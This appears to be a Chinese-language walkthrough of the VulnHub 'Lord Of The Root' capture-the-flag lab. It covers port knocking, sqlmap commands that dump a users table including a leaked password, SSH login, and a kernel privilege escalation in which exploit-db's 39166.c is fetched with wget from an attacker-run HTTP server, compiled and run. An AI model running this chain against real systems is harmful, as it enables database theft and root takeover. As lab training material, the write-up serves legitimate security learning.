6-VulnHub-Lord Of The Root 1.0.1

VulnHub-Lord Of The Root: 1.0.1

靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/
目标:得到root权限&找到flag.txt
作者:尼德霍格007
时间:2021-7-16

信息收集

扫描目标主机

nmap -sP 192.168.21.0/24

6-VulnHub-Lord Of The Root 1.0.1_第1张图片

扫描开放端口

nmap -A -p 1-1000 192.168.21.141

6-VulnHub-Lord Of The Root 1.0.1_第2张图片

看到只开放了22端口,尝试连接一下

6-VulnHub-Lord Of The Root 1.0.1_第3张图片

easy as 1,2,3

提示敲门程序在运行

发送tcp的数据包分别到这三个端口

nmap -r -Pn -p 1,2,3 192.168.21.141

6-VulnHub-Lord Of The Root 1.0.1_第4张图片

再次扫描端口

6-VulnHub-Lord Of The Root 1.0.1_第5张图片

发现开启了1337端口,是个web服务,尝试访问

6-VulnHub-Lord Of The Root 1.0.1_第6张图片

只有一张图,英文来自指环王,意思是我愿意把魔戒带到MORDOR,访问一下mordor试试

6-VulnHub-Lord Of The Root 1.0.1_第7张图片

查看源代码

6-VulnHub-Lord Of The Root 1.0.1_第8张图片

有一串密文,像是base64

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

6-VulnHub-Lord Of The Root 1.0.1_第9张图片

解密两次得到

/978345210/index.php

是一个路径,访问

6-VulnHub-Lord Of The Root 1.0.1_第10张图片

获取shell

尝试弱口令登陆失败,就不放图了

不知道用户名和密码的情况下,可以使用SQLMAP注入试一下

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms --dbs

-o:开启所有优化
-u:指定目标URL
–forms:自动判断注入
–dbs:枚举DBMS所有的数据库名称

(有提示y/n时,看不懂默认y就可以或者直接回车)

6-VulnHub-Lord Of The Root 1.0.1_第11张图片

这里获得了一个Webapp数据库,继续获取Webapp表信息

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp --tables

-D:指定数据库
–tables:列出该数据库所有的表

这里获得了一个Users表

6-VulnHub-Lord Of The Root 1.0.1_第12张图片

继续对表内容进行信息获取

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users --columns

-T:指定表
–columns:列出该表的所有表项

6-VulnHub-Lord Of The Root 1.0.1_第13张图片

表中有三个字段id,password,和username

继续获取表中详细信息

 sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users -C id,username,password --dump

-C:指定列
–dump:转储DBMS的数据库中的表项

6-VulnHub-Lord Of The Root 1.0.1_第14张图片

得到用户名和密码,使用这些用户名和密码ssh登录

ssh *用户名*@*ip*

最后成功登录

用户名:smeagol

密码:MyPreciousR00t

6-VulnHub-Lord Of The Root 1.0.1_第15张图片

提权

uname -a查看靶机内核版本和系统版本

image-20210716205721360

在https://www.exploit-db.com/查找可利用漏洞

6-VulnHub-Lord Of The Root 1.0.1_第16张图片

点击下载按钮把exp文件下载到本地

在kali攻击机用python开启一个简单的http服务

python -m SimpleHTTPServer 6666

image-20210716212156189

把文件下载到靶机

靶机执行

wget http://192.168.21.128:6666/39166.c

编译

gcc 39166.c -o p

-o指定编译后的文件名

给执行权限

chmod +x p

运行

./p

6-VulnHub-Lord Of The Root 1.0.1_第17张图片

此时可以看到已经是root组的用户了,提权成功

image-20210716211107811

获得flag,任务完成

image-20210716211300998

总结

这次的漏洞复现主要考察了port_knocking、使用sqlmap获取数据库信息和利用ubuntu系统漏洞来提权,难度适中。对我来说,port_knocking是之前没有见到过的,需要多加练习。而且使用sqlmap获取数据库信息和查找系统漏洞进行利用的能力也需要多加锻炼。

你可能感兴趣的:(vulnhub50,数据库,linux,python,安全,c语言)